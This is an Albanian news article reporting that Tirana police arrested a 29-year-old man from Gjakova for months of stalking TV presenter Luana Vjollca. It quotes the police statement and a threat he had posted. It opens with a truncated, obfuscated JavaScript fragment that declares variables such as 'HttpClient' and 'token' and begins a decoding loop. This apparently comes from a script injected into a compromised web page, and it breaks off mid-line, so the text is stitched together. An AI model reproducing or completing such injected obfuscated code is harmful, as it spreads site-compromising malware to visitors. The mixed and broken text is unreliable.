;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Policia në Tiranë arreston të riun nga Gjakova që përndiqte Luana Vjollcën

By

Policia e Tiranës ka arrestuar një të ri nga Kosova, i cili akuzohet se prej disa muajsh përndiqte moderatoren Luana Vjollca.

Ai është 29-vjeçari Ajdin Morina, i cili është prangosur nga policia e Tiranës në orët e para të mëngjesit të sotëm.

Sipas Oranews, Morina, nga Gjakova, kishte shkuar mëngjesin e sotëm në rrugën pranë banesës se Vjollcës, ku edhe është arrestuar në flagrancë.

Sipas policisë së Tiranës, i riu e përndiqte në mënyrë të vazhdueshme moderatoren, ndërsa kjo e fundit e ka denoncuar edhe në maj të 2020 se e përndiqte dhe e ngacmonte prej disa muajsh.

Noftimi i Policisë Tiranë:

Specialistët për Hetimin e Krimit në Komisariatin e Policisë Nr. 1 bënë arrestimin në flagrancë të shtetasit A. M., 29 vjeç, banues në Gjakovë, Kosovë, pasi në mënyrë të vazhdueshme ka përndjekur një shtetase.

Në një postim që e kishte bërë në tetor të vitit të kaluar, ai kishte kërcënuar edhe të gjithë ata që bashkëpunojnë me dy motrat se do të kenë “masakra në familje”.

Artikuj të ngjashëm